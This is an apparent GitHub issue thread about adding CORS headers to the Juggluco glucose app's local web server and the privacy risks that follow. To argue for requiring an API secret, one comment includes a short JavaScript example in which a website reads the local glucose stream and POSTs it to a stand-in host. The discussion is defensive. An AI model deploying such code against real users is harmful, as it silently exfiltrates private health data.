### ISSUE TITLE
CORS in web server?

### ISSUE THREAD

**Issue by jmandel** [j-kaltes/Juggluco#136]
Thanks for this incredible app!

Has there been consideration of adding an option for CORS support in the built-in web server? I'd like to explore building a static web app that can connect to my local juggluco over http and (with an appropriate API key, and from a restricted set of origins) pull data from the app. But this would require [CORS headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) in the juggluco web server response.

I'd be happy to work on a contribution if that's helpful.

**Comment by j-kaltes** [comment]
I made some changes, and according to https://www.test-cors.org/ it works with CORS.
Here is an URL to the new version:
https://drive.google.com/file/d/12b63DcsUbcxFZJhR2YsUOBJEhBq9dF0D/view

**Comment by jmandel** [comment]
Thanks! I can confirm this works. For safety it's important that this be an opt-in feature -- and also additionally at least one of:

* users should have the option to supply a restricted set of origins, instead of `*`
* it shouldn't be allowed without an api_secret set

Otherwise the risk is that if a user visits any website in their browser, that website can silently grab all the data like:

```js
const glucose = await fetch("127.0.0.1:17850/x/stream");
fetch("http://dev.example.com", {
    method: "POST",
    body: await glucose.text()
})
```

**Comment by jmandel** [comment]
Just for ease of testing, here's an app that shows a table or chart of past 24h stream, assuming http://127.0.0.1:17850/x/stream is active:

Source: https://glitch.com/edit/#!/gluco?path=index.html
Hosted: https://gluco.glitch.me

**Comment by j-kaltes** [comment]
I don’t see how this CORS restriction on what browser do can contribute to privacy or security. When you enter the api_secret they can do with it whatever they want. These CORS nonsense will not help you. You have to trust the maker of website.

**Comment by jmandel** [comment]
The issue is ensuring that people who turn on the web server but do not create a secret (or create an insecure secret) are protected by default from random web sites scraping their data.

**Comment by j-kaltes** [comment]
Yes, now it is the case that when you specify _local only_ and no api_secret, an arbitrary site you visit can get access to the data. But restricting this to particular websites would be very difficult to configure for the user: They need to enter the urls of the websites from which it is allowed to access the data.
It is easier to allow it only when an api_secret is specified.

**Comment by jmandel** [comment]
I agree, that's a reasonable approach and consistent with my "at least one of" suggestion at https://github.com/j-kaltes/Juggluco/issues/136#issuecomment-2004329732

Thanks for the ultra quick prototype and the good discussion here!

**Comment by jmandel** [comment]
Reading more closely, I do think the API key should be required *irrespective of the local-only flag.* People have some reason to understand that the networking and firewalling around their device can prevent it from being accessible by arbitrary outside parties, but CORS totally breaks that assumption because it makes their server accessible from any website.

A simple way to implement this could be to make CORS functionality be gated by the API Token checkbox.

**Comment by j-kaltes** [comment]
I have uploaded a new version to https://www.juggluco.nl/Juggluco/download.html that requires a api_secret larger than 7.
